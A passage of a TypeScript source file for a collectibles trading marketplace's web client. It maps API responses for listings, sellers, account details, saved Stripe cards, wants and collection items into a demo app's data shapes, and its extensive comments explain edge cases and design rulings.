    exchangeFor?: string | null;
    category: string;
    /** listings.created_at. The handler selects the whole row (`listing: listings`),
     *  so it is on the wire; optional here so an older cached page cannot break
     *  the mapper. Read only for New Arrivals on the category page. */
    createdAt?: string | null;
    /** listings.subcategory — the CHILD slug, from the app's own taxonomy
     *  (constants/categories.ts, mirrored into data.js as SUBCATS).
     *
     *  Already on the wire for the same reason cashPrice is: the handler
     *  selects the whole listings row (`listing: listings`, listings.ts:406).
     *  Measured 2026-08-30 — present on 100 of 100 prod rows and 43 of 43 on
     *  staging, absent on none, so this declares what already arrives rather
     *  than asking for something new.
     *
     *  🔑 NOT `| null`. The column is `text DEFAULT '' NOT NULL`, so an untagged
     *  legacy row carries the EMPTY STRING, never null — which is why the mapper
     *  folds it with `||` and not `??`. 9 of 100 prod rows are in that state. */
    subcategory: string;
    acceptsCash: boolean;
    acceptsItems: boolean;
    acceptsHybrid: boolean;
    upvotes: number;
    downvotes: number;
    likes: number;
    isFeatured: boolean;
    /** All four confirmed on the wire (same full-row select as every other
     *  field here, listings.ts:405-411) and mirrored field-for-field on
     *  ListingRowData (api-server/src/routes/listing-og.ts:173-179), the
     *  SSR crawl page's own model — reused rather than re-derived so the two
     *  surfaces can't disagree about what "brand" or "graded" means. */
    brand: string | null;
    graded: boolean;
    grade: string | null;
    grader: string | null;
    /** The persisted price check, as JSON — see parseStoredPriceCheck for the
     *  shape and for why this field cannot be trusted to hold one.
     *
     *  On the wire by the same full-row select as every other field here
     *  (`listing: listings`, listings.ts:406) and explicitly re-emitted by the
     *  detail handler (listings.ts:542, :569). MEASURED on staging
     *  2026-08-25: the first row of GET /api/listings carried
     *  `{"min":25,"max":40,"confidence":"low","reasoning":"Based on general
     *  market trends…"}`. */
    aiVerdictReason: string | null;
  };
  seller: {
    /** users.id — on the wire (listings.ts:411 selects `id: users.id` into
     *  this same sub-object) and simply missing from this file's own type
     *  until now, same class of gap as `trades` below. Needed to call the
     *  new GET /api/reviews/summary/:userId (ratingFixups.ts) — that route
     *  takes the real user id, not the handle. */
    id: string;
    username: string;
    displayName: string | null;
    avatar: string | null;
    traderLevel: string | null;
    tradeCount: number | null;
    /** users.totalAccumulatedPoints — the LEVEL input. The route's own select
     *  comment (listings.ts:415-418) says the client computes the level from
     *  it; mapSellerToUser does, through levelFromPoints.ts. Optional for the
     *  same reason createdAt is: the route caches its rows, and a page cached
     *  before the field joined the select comes back without it — absent reads
     *  as level 1, the value every seller carried before this was read. */
    totalAccumulatedPoints?: number | null;
    /** The seller's gem, named by the server (toPublicSeller, api-server
     *  lib/serializers.ts) from the SAME points, BEFORE the privacy strip —
     *  Tyler's ruling 2026-09-27 (card 1218405950784016): "Show Points" hides
     *  the NUMBER and keeps the tier. So a seller who hid their points arrives
     *  with gemTier and no totalAccumulatedPoints, and this field is the only
     *  way their tier can reach the seller card (card 1219077706989065). Title
     *  Case on the wire ("Emerald"). Optional: a page cached before the field
     *  joined the response, and a seller with no number at all, carry none. */
    gemTier?: string | null;
    /** users.createdAt — the seller's join date, added to this endpoint's
     *  select 2026-08-26. Optional because the route caches its rows, so a page
     *  cached before that deploy comes back without it; absent reads as the
     *  same honest blank the field had for its whole life until now. */
    createdAt?: string | null;
  };
  matchesViewerWant?: boolean;
  /** The seller's saved wants (users' wants rows, titles), sent on every row.
   *  The listing detail page's "@seller Is Looking For" chips read them through
   *  lookingFor; nothing on the web read this field until 2026-09-10, so a real
   *  seller's wants never showed there. Feed cards do not show them (Blake
   *  2026-08-23: Looking For lives on listing detail only). */
  sellerWantsItems?: string[];
}

/** Minimal shape of one GET /api/categories row
 *  (api-server/src/routes/categories.ts buildCategoryTree): `id` is the slug
 *  (a UUID only for a slugless row — CATEGORIES below only has slugged
 *  entries, so an unmatched id is simply never used) and `listing_count` is
 *  the server-computed real count. Every other field on the wire (name,
 *  icon, color, subcategories, ...) is ignored — the mosaic only needs the
 *  count, and Blake's CATEGORIES array already supplies its own label/tile. */
export interface ApiCategoryRow {
  id: string;
  listing_count: number;
}

/** Blake's five collection words, plus one. His fixture uses the five, and
 *  `exchMineItems` (app.js:3505) branches on them: PENDING disables with
 *  "Pending", SOLD/TRADED disable with their own word, and IN COLLECTION stays
 *  SELECTABLE — an unlisted collection piece may ride your side of an Exchange.
 *  IN REVIEW (card 1219177682942591, lane A for Blake 2026-10-17) is a listing
 *  waiting on the photo check: it stays selectable too (the ruling of
 *  2026-08-24 stands), it is not tagged UNLISTED, and its tile says what it is
 *  instead of offering "List It" on a listing that is listed. */
export type DemoCollectionStatus = "ACTIVE" | "PENDING" | "SOLD" | "TRADED" | "IN REVIEW" | "IN COLLECTION";
/** The sixth word: server `under_review`. The app's grid chip says the same (lib/stateChipLabel.ts). */
export const IN_REVIEW_STATUS: DemoCollectionStatus = "IN REVIEW";

/** Blake's MY_COLLECTION[] row shape. */
export interface DemoCollectionItem {
  id: string;
  title: string;
  image: string;
  value: number;
  status: DemoCollectionStatus;
  chips: string[];
  /** Absent for a standalone collection piece that was never a listing. His own
   *  fixture has these (`my-boosterbox`), and `exchMineItems` guards with
   *  `m.lid && LISTINGS.find(...)`. */
  lid?: string;
  /** Stands in as the DESCRIPTION when there is no linked listing —
   *  `desc: l ? l.description : (m.note || "From my collection.")`. */
  note?: string;
}

/**
 * GET /api/users/me — only the fields this lane reads.
 *
 * toPrivateUser (lib/serializers.ts) strips ONLY secrets: password hash, reset
 * and verification tokens, push token. Every column below therefore survives onto
 * the wire. Verified against the serializer rather than assumed.
 */
export interface ApiPrivateUser {
  email: string | null;
  displayName: string | null;
  /** users.bio. On the wire because toPrivateUser strips only secrets, verified
   *  against the serializer rather than assumed. Absent from this interface
   *  until 2026-09-01, which is why the profile bio had no route back to the
   *  floor: it saved to the server and nothing ever read it. */
  bio: string | null;
  /** users.shipping_address_json. Shape mirrors the server's own
   *  toShippingAddress: { name, street1, city, state, zip, country, phone }. */
  shippingAddressJson: unknown;
  /** 🔑 The contract said the saved card was UNREACHABLE — that the only route to
   *  a customerId was POST /api/stripe/customers, which MINTS a Stripe customer,
   *  and creating a billing object to paint a screen is not a read. That is no
   *  longer true: users.stripe_customer_id is a column and this serializer keeps
   *  it, so the id arrives with the profile. Null means no customer exists yet,
   *  which is an answer rather than a gap. */
  stripeCustomerId: string | null;
}

/** GET /api/stripe/customers/:customerId/payment-methods */
export interface ApiPaymentMethods {
  paymentMethods: Array<{
    paymentMethodId: string;
    brand: string;
    last4: string;
    expMonth: number;
    expYear: number;
    isDefault: boolean;
  }>;
}

export interface DemoAccountShip {
  name: string;
  street: string;
  city: string;
  state: string;
  zip: string;
}

export interface DemoAccountCard {
  brand: string;
  last4: string;
  /** "MM/YY" — Blake prints it raw after "exp ". */
  exp: string;
}

/** Blake's ACCOUNT.identity. Empty strings, never null: his inputs render
 *  value="${esc(ACCOUNT.identity.email)}" and a null would paint "null". */
export function mapAccountIdentity(u: ApiPrivateUser): { email: string; displayName: string; bio: string } {
  return { email: u?.email ?? "", displayName: u?.displayName ?? "", bio: u?.bio ?? "" };
}

/**
 * The shipping address, or every field empty.
 *
 * 🔴 ALL-OR-NOTHING, mirroring the server's own toShippingAddress guard: it
 * returns null unless name, street1, city, state AND zip are all present.
 *
 * A half-filled address on a CHECKOUT screen is worse than none — "Ships to:
 * Jane Doe, , RI" reads as a system that lost part of your address rather than
 * one you never finished giving it. And Blake shows the whole block whenever
 * ship.name alone is truthy, so a partial would render.
 *
 * 📌 street1 on the wire becomes street for Blake. He has ONE street line and
 * renders street2 nowhere, so carrying it would invent a field. Checked against
 * his co-addr and acct-street templates.
 */
/**
 * The personalization block, from the columns GET /api/users/me already sends.
 *
 * 📌 Only the FOUR that accountSettings.ts actually saves. ageRange and
 * shopPref are deliberately absent: neither has a column (see that module's
 * header and the two Asana cards), so there is nothing to read back and
 * pretending otherwise would paint a value the server never held.
 *
 * Shaped empties, never null: his chip renderers call ACCOUNT.cats.includes()
 * and ACCOUNT.vibes.includes() unguarded, so a null would throw the account
 * page rather than render it blank.
 */
export function mapAccountPersonalization(u: ApiPrivateUser): {
  cats: string[];
  vibes: string[];
  clothing: string;
  shoe: string;
} {
  const arr = (v: unknown): string[] =>
    Array.isArray(v) ? v.filter((x): x is string => typeof x === "string") : [];
  return {
    cats: arr((u as { categoryInterests?: unknown })?.categoryInterests),
    vibes: arr((u as { styleVibes?: unknown })?.styleVibes),
    clothing: (u as { clothingSize?: unknown })?.clothingSize as string ?? "",
    shoe: (u as { shoeSize?: unknown })?.shoeSize as string ?? "",
  };
}

export function mapAccountShip(u: ApiPrivateUser): DemoAccountShip {
  const EMPTY: DemoAccountShip = { name: "", street: "", city: "", state: "", zip: "" };
  const raw = u?.shippingAddressJson;
  let a: unknown = raw;
  if (typeof raw === "string") {
    try {
      a = JSON.parse(raw);
    } catch {
      return EMPTY;
    }
  }
  if (a === null || typeof a !== "object") return EMPTY;
  const rec = a as Record<string, unknown>;
  const s = (k: string): string => (typeof rec[k] === "string" ? (rec[k] as string).trim() : "");
  const out: DemoAccountShip = {
    name: s("name"),
    street: s("street1"),
    city: s("city"),
    state: s("state"),
    zip: s("zip"),
  };
  return Object.values(out).every((v) => v !== "") ? out : EMPTY;
}

/**
 * The default saved card, or null.
 *
 * Prefers isDefault, falling back to the first only when Stripe reports none as
 * default — which it does when a customer has exactly one method and no invoice
 * default is set. Blake's row shows ONE card, so choosing is required.
 */
export function mapAccountCard(body: ApiPaymentMethods): DemoAccountCard | null {
  const list = Array.isArray(body?.paymentMethods) ? body.paymentMethods : [];
  const pm = list.find((m) => m?.isDefault) ?? list[0];
  if (!pm || typeof pm.last4 !== "string" || pm.last4 === "") return null;
  const mm = Number(pm.expMonth);
  const yy = Number(pm.expYear);
  /* A card with an unusable expiry still has a brand and a last4, and Blake
     prints "exp " unconditionally — so this becomes an empty string rather than
     "exp NaN/NaN". */
  const exp =
    Number.isFinite(mm) && Number.isFinite(yy) && mm >= 1 && mm <= 12 && yy > 0
      ? String(mm).padStart(2, "0") + "/" + String(yy).slice(-2)
      : "";
  return { brand: typeof pm.brand === "string" && pm.brand ? pm.brand : "CARD", last4: pm.last4, exp };
}

/**
 * Fetch and install identity, shipping address and saved card.
 *
 * ⚠️ The card is a SECOND round trip and best-effort on its own. No
 * stripeCustomerId means no Stripe customer exists, which is an answer rather
 * than a failure. A profile that loads without a card still populates identity
 * and shipping, because the address is what checkout actually needs and a card
 * row is not worth losing it over.
 */
/** What the prefill reset reports back. `reset: false` means it ran too early
 *  (before app.js) and the chips are still pre-selected. */
export interface AuthPrefillResetReport {
  reset: boolean;
  cleared?: number;
  reason?: string;
}

/**
 * Clear the registration chips Blake ships pre-selected.
 *
 * 🔑 MUST BE CALLED AFTER loadScript(APP_SRC). The bindings it clears are
 * declared in app.js; called any earlier it reports `reset: false` rather than
 * failing silently, which is the whole point of it returning anything at all.
 * The first version of this fix ran during install, did nothing, and reported
 * nothing. See the bridge function for the full story.
 */
export function resetAuthPrefill(win: Window): AuthPrefillResetReport {
  const fn = (win as unknown as { __gbzResetAuthPrefill?: () => AuthPrefillResetReport })
    .__gbzResetAuthPrefill;
  if (typeof fn !== "function") {
    return { reset: false, reason: "bridge script has not run yet (__gbzResetAuthPrefill missing)" };
  }
  return fn();
}

export async function installAccount(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
): Promise<boolean> {
  const bridge = (
    win as unknown as {
      __gbzInstallAccount?: (
        identity: { email: string; displayName: string; bio: string },
        ship: DemoAccountShip,
        card: DemoAccountCard | null,
      personal: { cats: string[]; vibes: string[]; clothing: string; shoe: string },
      ) => void;
    }
  ).__gbzInstallAccount;
  if (typeof bridge !== "function") {
    throw new Error("installAccount: bridge script has not run yet (__gbzInstallAccount missing)");
  }

  const res = await authFetch("/api/users/me");
  if (!res.ok) {
    console.warn(`[web-install] account: GET /api/users/me failed (${res.status}) — left empty`);
    return false;
  }
  const me = (await res.json()) as ApiPrivateUser;

  let card: DemoAccountCard | null = null;
  if (me?.stripeCustomerId) {
    try {
      const pmRes = await authFetch(
        `/api/stripe/customers/${encodeURIComponent(me.stripeCustomerId)}/payment-methods`,
      );
      if (pmRes.ok) card = mapAccountCard((await pmRes.json()) as ApiPaymentMethods);
    } catch {
      // a missing card row rather than a missing account — see the note above
    }
  }

  /* Personalization LAST: the bridge treats it as optional so an older bridge
     (one injected before this argument existed) simply ignores it rather than
     throwing — the same best-effort posture every other lazy installer takes. */
  bridge(mapAccountIdentity(me), mapAccountShip(me), card, mapAccountPersonalization(me));
  return true;
}

/* ══════════════════════════════════════════════════════════════════════════
   SIGN OUT (card 1217901370191010) — a deliberate exception to "no new
   write paths".

   app.js's own [data-acctsignout] handler was `store.authed = false;
   location.hash = "#/"; render(); toast(...)` — and store.authed's setter is
   a permanent no-op (the identity pin above), so that assignment was ALREADY
   inert even before considering the server: nothing about the click ever
   touched /api/auth/logout, so the session cookie survived and a reload (or
   the #677 identity boot on the visitor's next /web visit) signed them right
   back in. The real endpoint (POST /api/auth/logout, auth.ts:566) revokes
   the refresh token server-side and clears the cookie; it needs to actually
   run for a sign-out to BE one.
   ══════════════════════════════════════════════════════════════════════════ */

/**
 * Signs out for real, then reboots the tab as a clean guest.
 *
 * `signOut` is INJECTED, not re-implemented here: it is AuthContext's own
 * signOut (POST /api/auth/logout, credentials: "include", then
 * clearSession() + the cross-tab BroadcastChannel notice) — the SAME
 * function every other route's sign-out already calls, since /web reads
 * identity off this SAME AuthContext (WebInstall.tsx's `user`/`authFetch`
 * both come from useAuth()). Reusing the real function is more faithful than
 * matching its "call shape" with a second POST — one source of what signing
 * out means, not two that can drift. floorTransport.ts stays framework-free
 * (no React/context import here, matching every other export in this file,
 * which all take their dependencies as parameters) — the caller supplies it.
 *
 * FAIL-OPEN BY DESIGN: the POST is awaited but its rejection is swallowed.
 * The boot is one-shot per tab (installFloorListings' own doc comment
 * above) — THREADS/WALLET/ACCOUNT/USERS[me] are already sitting in memory
 * hydrated from the OLD session, and nothing here can un-hydrate them
 * in place. A reload is the only way back to a genuinely clean guest state,
 * so it happens regardless of whether the revoke call succeeded — the
 * alternative (staying on this page, looking signed out, while the floor
 * still shows this visitor's own listings and deals) is worse than a logout
 * that revoked nothing server-side on a network blip.
 *
 * `win.location.hash = "#/"` before `win.location.reload()`, not
 * `win.location.href = "/#/"`: setting the hash is a same-document, no-op-
 * for-navigation write (harmless if it never reloads for some reason), and
 * `reload()` re-requests the CURRENT url — hash included — so the reboot
 * lands on the signed-in-home ROUTE, freshly booted as a guest.
 */
export async function signOutAndReload(win: Window, signOut: () => Promise<void>): Promise<void> {
  await signOut().catch(() => {
    // Network failure or similar — see the fail-open note above. Still reload.
  });
  win.location.hash = "#/";
  win.location.reload();
}

/** GET /api/wants/me row — only the fields this lane reads. */
export interface ApiWant {
  id: string;
  category: string;
  subcategory: string;
  title: string;
  notes: string | null;
  condition: string | null;
  graded: boolean | null;
  minGrade: number | null;
  newSealedOnly: boolean | null;
  sizeUs?: string | null;
  shirtSize?: string | null;
  pantWaist?: number | null;
  pantInseam?: number | null;
}

/**
 * Blake's `myLookingFor[]` row, MINUS `label`.
 *
 * 🔑 The label is deliberately absent here and composed by the bridge instead.
 * Building it needs SUBCATS and CATEGORIES to turn slugs into display words, and
 * both live in data.js's classic-script lexical scope where this ES module
 * cannot reach them. Emitting a label from here would mean copying his taxonomy
 * tables into TypeScript — the five-copies-of-the-fee-formula antipattern, on a
 * table that changes whenever a category is added.
 */
export interface DemoWant {
  /** The server's id, for DELETE /api/wants/:id (wantsWrite.ts); absent on a want the page alone holds. */
  id?: string;
  name: string;
  cat: string;
  sub: string;
  cond: string;
  /** Never read by app.js — grepped, zero dereferences. Present only because his
   *  fixture rows carry it, so the shape stays faithful. */
  attrs: Record<string, string>;
  notes: string;
  graded: boolean;
  minGrade: number | null;
  sealed: boolean;
  /** The pop-up draft's own size fields and shapes (shirt "M" or null; waist, inseam and shoe as
   *  text, "" when absent), so the duplicate check compares a server row with a draft like with like. */
  shirt?: string | null;
  waist?: string;
  inseam?: string;
  shoe?: string;
}

/**
 * GET /api/wants/me rows into his shape.
 *
 * `cond` defaults to "Any" rather than "": his own builder treats "Any" as the
 * no-condition case (`d.cond !== "Any"` at app.js:1066 is what keeps it out of
 * the label), so a null condition IS "Any" in his vocabulary. An empty string
 * would be a third state neither side has a meaning for.
 */
export function mapWants(rows: ApiWant[]): DemoWant[] {
  const out: DemoWant[] = [];
  for (const r of rows) {
    if (r === null || typeof r !== "object" || typeof r.id !== "string") continue;
    out.push({
      id: r.id,
      name: r.title ?? "",
      cat: r.category ?? "",
      sub: r.subcategory ?? "",
      cond: r.condition ?? "Any",
      attrs: {},
      notes: r.notes ?? "",
      graded: r.graded === true,
      minGrade: typeof r.minGrade === "number" && Number.isFinite(r.minGrade) ? r.minGrade : null,
      sealed: r.newSealedOnly === true,
      shirt: r.shirtSize ?? null,
      waist: typeof r.pantWaist === "number" && Number.isFinite(r.pantWaist) ? String(r.pantWaist) : "",
      inseam: typeof r.pantInseam === "number" && Number.isFinite(r.pantInseam) ? String(r.pantInseam) : "",
      shoe: r.sizeUs ?? "",
    });
  }
  return out;
}

/**
 * Fetch and install the visitor's Looking For list.
 *
 * Best-effort and auth-gated. The bridge already CLEARS `myLookingFor` during the
 * floor install, so a failure leaves an honest empty list and an "0 active wants"
 * row — never Blake's four fixture wants, which name a specific Omega reference
 * and a specific sampler and would read as this visitor's own.
 *
 * 📌 Uses `/api/wants/me`. `GET /api/wants/` is byte-identical to it — same query,
 * same ordering, same response — but `/me` says what it means at the call site.
 */
export async function installWants(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
): Promise<number> {
  const bridge = (
    win as unknown as { __gbzInstallWants?: (rows: DemoWant[]) => number }
  ).__gbzInstallWants;
  if (typeof bridge !== "function") {
    throw new Error("installWants: bridge script has not run yet (__gbzInstallWants missing)");
  }
  const res = await authFetch("/api/wants/me");
  if (!res.ok) {
    console.warn(`[web-install] wants: GET /api/wants/me failed (${res.status}) — list left as it was`);
    return 0;
  }
  const body = (await res.json()) as ApiWant[];
  if (!Array.isArray(body)) return 0;
  return bridge(mapWants(body));
}

/** GET /api/collections row — only the fields this lane reads. */
export interface ApiCollectionItem {
  id: string;
  listingId: string | null;
  listingStatus: string | null;
  title: string;
  description?: string | null;
  imageUrl: string | null;
  estimatedValue: string | number | null;
  acceptsCash: boolean;
  acceptsItems: boolean;
  acceptsHybrid: boolean;
}

/**
 * The EIGHT server statuses, mapped onto Blake's FIVE words.
 *
 * `listing_status` is a pgEnum of exactly eight
 * (lib/db/src/schema/listings.ts:14). Null means the row is a standalone
 * collection piece with no listing behind it at all.
 *
 *   active        ACTIVE
 *   pending       PENDING
 *   sold          SOLD
 *   traded        TRADED
 *   unlisted      IN COLLECTION
 *   under_review  IN REVIEW       ← ruling (Tyler, 2026-08-24): shows; its own word since 2026-10-17
 *   removed       hidden
 *   paused        hidden
 *   (null)        IN COLLECTION
 *
 * 📌 `under_review` shows rather than hides so an item in moderation stays
 * visible to its own owner and stays tradeable on their side of an Exchange.
 * The alternative is a piece silently vanishing from your own closet while
 * moderation runs, with nothing on screen to explain it. It wore IN COLLECTION
 * until card 1219177682942591 (lane A for Blake, 2026-10-17): that chip offered
 * "List It" and an estimate on a listing that is listed, so the word is now its
 * own, with the same visibility and the same place in an Exchange.
 *
 * 🔴 An UNKNOWN status hides. A ninth value would be a schema change we have not
 * ruled on, and the failure directions are not symmetric: hiding costs the owner
 * one tile, while defaulting to IN COLLECTION would make it SELECTABLE, so a
 * newly-terminal item could be offered in a trade the owner can no longer honour.
 */
const COLLECTION_STATUS: Record<string, DemoCollectionStatus | null> = {
  active: "ACTIVE",
  pending: "PENDING",
  sold: "SOLD",
  traded: "TRADED",
  unlisted: "IN COLLECTION",
  under_review: IN_REVIEW_STATUS,
  removed: null,
  paused: null,
};

/**
 * 🔴 `hasOwnProperty`, not `?? null`, and the difference is not cosmetic.
 *
 * COLLECTION_STATUS is a plain object literal, so a bracket lookup walks the
 * prototype chain. `COLLECTION_STATUS["constructor"]` resolves to the global
 * Object FUNCTION — which is neither null nor undefined, so `?? null` does not
 * catch it, and TypeScript cannot see the path at all because the declared
 * `Record<string, ...>` promises it cannot happen. The function itself would be
 * handed out as a DemoCollectionStatus.
 *
 * The same defect class as the SUBCATS lookup in __gbzInstallWants above, and
 * the opposite failure mode: that one throws and takes the rest of the loop
 * with it, this one returns a live reference to Object and renders quietly.
 * A silent wrong value is the harder of the two to ever notice, which is why
 * it is fixed here even though `listings.status` is a controlled DB enum and
 * the string is not reachable from a real row today. It is one line, and the
 * guard costs nothing on the eight real values.
 */
export function collectionStatusFor(listingStatus: string | null): DemoCollectionStatus | null {
  if (listingStatus === null) return "IN COLLECTION";
  if (!Object.prototype.hasOwnProperty.call(COLLECTION_STATUS, listingStatus)) return null;
  return COLLECTION_STATUS[listingStatus] ?? null;
}

/**
 * GET /api/collections rows into Blake's MY_COLLECTION shape.
 *
 * 🔴 `estimatedValue` is a TEXT column (lib/db/src/schema/activity.ts), so it
 * arrives as a STRING. Blake sums it with `sel.reduce((s, i) => s + i.value, 0)`
 * (app.js exchTotals), and a string makes that CONCATENATE — `0 + "120"` is
 * `"0120"` — which would corrupt both Exchange totals, the EVEN/IN-YOUR-FAVOR
 * verdict and the favor bar on the one surface whose entire job is comparing two
 * values. Coerced with Number(), matching how the app itself reads this column
 * everywhere (profile.tsx:537, collections.tsx:101, collection-item/[id].tsx:136).
 * A non-finite falls back to 0, which is also the column's own default.
 */
export function mapMyCollection(rows: ApiCollectionItem[]): DemoCollectionItem[] {
  const out: DemoCollectionItem[] = [];
  for (const r of rows) {
    /* 🔴 A row must PROVE it is a collection row before it can enter someone's
       closet. Both shapes the endpoint can return always emit a listingStatus
       key — `toCollectionResponse` writes `listingStatus ?? null` and
       `syntheticCollectionFromListing` writes `l.status` — so a row without the
       key is not from this endpoint.

       Without this, any array-shaped 200 becomes a closet: a missing key reads
       as `undefined ?? null`, which is the STANDALONE case, so every row would
       land as a selectable IN COLLECTION piece. That is the absence-fabrication
       class this lane keeps refusing, and it is not hypothetical — a blanket
       fetch mock fed the listings payload to this call and produced a 22-item
       collection out of 2 real rows. The sibling /api/categories read survives
       the same thing only because it reads `body.categories`, which an array
       does not have. This is that same carefulness, made deliberate. */
    if (r === null || typeof r !== "object" || !("listingStatus" in r) || typeof r.id !== "string") continue;
    const status = collectionStatusFor(r.listingStatus ?? null);
    if (status === null) continue;
    const n = Number(r.estimatedValue);
    /* Chips describe what a LIVE listing accepts, so they ride only the
       statuses where a live listing exists. His own fixture agrees: my-cans is
       PENDING with ["TRADE"], every sold/traded/unlisted row has []. A listing
       in review carries its terms too: it is listed, waiting on the photo
       check, and the tile says what it will offer (card 1219177682942591). */
    const live = status === "ACTIVE" || status === "PENDING" || status === IN_REVIEW_STATUS;
    const item: DemoCollectionItem = {
      id: r.id,
      title: r.title ?? "",
      image: safeUrl(r.imageUrl),
      value: Number.isFinite(n) ? n : 0,
      status,
      chips: live
        ? [r.acceptsCash && "SALE", r.acceptsItems && "TRADE", r.acceptsHybrid && "HYBRID"].filter(
            (c): c is string => typeof c === "string",
          )
        : [],
    };
    if (r.listingId) item.lid = r.listingId;
    if (r.description) item.note = r.description;
    out.push(item);
  }
  return out;
}

/**
 * The endpoint's rows over the listings-derived ones, keyed by LISTING id.
 *
 * Both sources can describe the same listing: `installFloorListings` already
 * derives ACTIVE rows from the floor feed, and GET /api/collections synthesizes
 * rows for active/pending listings that were never added to user_collections.
 * Without a merge the closet double-counts, and a double-counted row is worse
 * than a missing one here because value feeds a trade valuation.
 *
 * The endpoint wins because it is strictly better informed: it sees the live
 * `listing_status` for all eight values, it carries standalone pieces that have
 * no listing at all, and it does not depend on which listings the floor feed
 * loaded. A listing the endpoint did not mention keeps its derived row.
 */
export function mergeMyCollection(
  derived: DemoCollectionItem[],
  fromEndpoint: DemoCollectionItem[],
): DemoCollectionItem[] {
  const claimed = new Set<string>();
  for (const r of fromEndpoint) if (r.lid) claimed.add(r.lid);
  return [...fromEndpoint, ...derived.filter((d) => !d.lid || !claimed.has(d.lid))];
}

/** Blake's LISTINGS[] row shape — the fields renderCard()/browseItems() read
 *  (app.js:131-187, 398-423) plus description/condition, which the detail
 *  page (one click away, via renderDetail) reads directly off the listing
 *  rather than off USERS. Fields his renderers need that we do NOT populate
 *  are named in the gap log, not silently defaulted to something that reads
 *  like real data. */
export interface DemoListing {
  id: string;
  title: string;
  description: string;
  condition: string;
  image: string;
  images: string[];
  declaredValue: number;
  category: string;
  /** The child slug, carried through so the subcategory pages and any future
   *  sub filtering operate on REAL listings (Blake's card 1217978408277067,
   *  seam 1). ABSENT rather than "" when the listing was never tagged — see the
   *  mapper for why that distinction is deliberate.
   *
   *  Optional because nothing reads it yet: `app.js` on develop references
   *  `.subcategory` zero times and PR #746 (the nav that consumes it) is stacked
   *  behind #724 and unmerged. Carrying it now means the data is already flowing
   *  when that lands, rather than the nav waiting on a second change. */
  subcategory?: string;
  acceptsCash: boolean;
  acceptsItems: boolean;
  acceptsHybrid: boolean;
  /** Blake's own "not for sale" flag (data.js's 3 collectionOnly fixture
   *  rows) — the ONE thing renderCard()/renderDetail() check to suppress
   *  vote bars, accepts-chips and the offer CTA (app.js:140-172, 823, 853,
   *  861, 867, 908, 919-920, 934, 972), swapping in a Message-only CTA
   *  instead. See mapCollectionItemRow below — real /api/feed/collection-
   *  items rows are mapped onto this SAME flag rather than a second one. */
  collectionOnly?: boolean;
  seller: string;
  fairVotes: number;
  overVotes: number;
  likes: number;
  buzzing: boolean;
  want: boolean | undefined;
  /** Optional — real listing rows on the wire (see ApiListingRow) but absent
   *  on 3 of 4 fixture listings, and always absent on a collectionOnly row
   *  mapped by mapCollectionItemRow (no `graded` concept for a collection
   *  piece). renderDetail guards both with `l.brand ?` / `l.graded ?`. */
  brand?: string;
  graded?: { grader: string; grade: string };
  /** Blake's own price-check field (app.js:824 reads `l.priceCheck`), absent
   *  from every one of his fixture rows — which is why his renderer has a
   *  fabricated fallback for it. Set from real stored data by
   *  parseStoredPriceCheck, or by a real run through
   *  __gbzSetListingPriceCheck. Absent means "no answer exists", which is a
   *  state Blake already renders honestly (the pre-run button). */
  priceCheck?: DemoPriceCheck;
  /** The seller's saved wants, for the detail page's "@seller Is Looking For"
   *  chips (app.js renderDetail reads `l.lookingFor || []`). From
   *  ApiListingRow.sellerWantsItems; always [] on a collection piece. */
  lookingFor?: string[];
  /** The item's OWN "Trade for" (exchange_for split on commas): what the seller would trade
   *  THIS item for, apart from their profile wants. Shown on the detail page above the profile
   *  block and seeded into the wizard on an edit (PR B, card 1218637972579066 item 4). */
  tradeFor?: string[];
  comments: DemoComment[];
  commentCount: number;
  /** listings.created_at as ms since epoch, or undefined when absent or
   *  unparseable. The category page sorts New Arrivals by it rather than by
   *  position, because rows merged into LISTINGS after boot are appended. */
  createdAt?: number;
}

/** Blake's price-check object, filled with real values.
 *
 * The SHAPE is read off his own renderer (app.js:874-902), not designed here:
 * `min`/`max` go through money() and into the marker arithmetic, so they must
 * be numbers; `confidence`/`verdict`/`reasoning` go through esc() into text
 * nodes, so they are already-formatted DISPLAY strings, not the API's
 * lowercase enums. His fabricated fallback object (app.js:825) is the only
 * documentation of that contract and it is what these field types mirror.
 *
 * `sources` and `grounded` ARE carried, and an earlier revision of this file was
 * wrong to drop them. It reasoned that neither appears anywhere in Blake's
 * markup (`grep -c sources public/web/app.js` is 0, as is `grounded`) and that a
 * field with no render site cannot be shown honestly. The premise does not hold:
 * this batch ALREADY creates DOM Blake never wrote — demoTextFixups.ts's
 * follower empty state builds its own node inside his modal — so "he has no
 * element for it" was never a constraint, only an assumption. Meanwhile
 * `grounded: false` was rendering as a confident market finding on real
 * listings, which is the exact fabrication class this whole install exists to
 * close. See priceCheckAttributionLabel below for the rule, and
 * demoTextFixups.ts's fixPriceCheckAttribution for the render site.
 *
 * Both are OPTIONAL, and that is mobile's semantics, not laziness: a check
 * persisted before the server started sending the flag leaves `grounded`
 * undefined, and undefined means "unknown", not "no market data". */
export interface DemoPriceCheck {
  min: number;
  max: number;
  confidence: string;
  verdict: string;
  reasoning: string;
  /** `undefined` = the stored row predates the flag. Never coerced to a
   *  boolean — see priceCheckAttributionLabel's `=== false`. */
  grounded?: boolean;
  /** Marketplace NAMES, not URLs, per the model contract at
   *  priceVerifier.ts:228 (`"sources":[<marketplace names>]`). Rendered as
   *  plain text and never as an href — see priceCheckAttributionLabel. */
  sources?: string[];
}

/** Blake's USERS[handle] shape, extended to every field renderPublicProfile()
 *  reads (app.js:1320-1425) — not just what the floor grid needs. USERS is
 *  a SHARED global: renderTopCollections() already forced memberSince/trades/
 *  sales into existence (Object.keys(USERS), unconditional), and clicking any
 *  seller handle on a real card (one click, no auth, data-gouser attribute)
 *  reaches renderPublicProfile, which reads bio/followers/following/ratings/
 *  badges/lvl too. Missing any of them doesn't crash (renderPublicProfile is
 *  more defensive than collectorCard was) but renders the literal text
 *  "undefined" three times over — recon 16, L3-2. Same root cause as the
 *  earlier collectorCard crash: patch the SHAPE, not each renderer as it's
 *  found. */
export interface DemoUser {
  /** users.id — see the seller.id comment on ApiListingRow above. Not one of
   *  Blake's own fields (his USERS[handle] objects carry no id at all — the
   *  handle IS the key); carried here purely as a lookup value for
   *  ratingFixups.ts, which cannot read USERS by name (global lexical scope,
   *  see this file's header) and so is handed a handle->id map instead. */
  id: string;
  handle: string;
  avatar: string | undefined;
  initials: string;
  level: string;
  memberSince: string;
  /** null means "no source for this count yet" — an HONEST UNKNOWN, never a
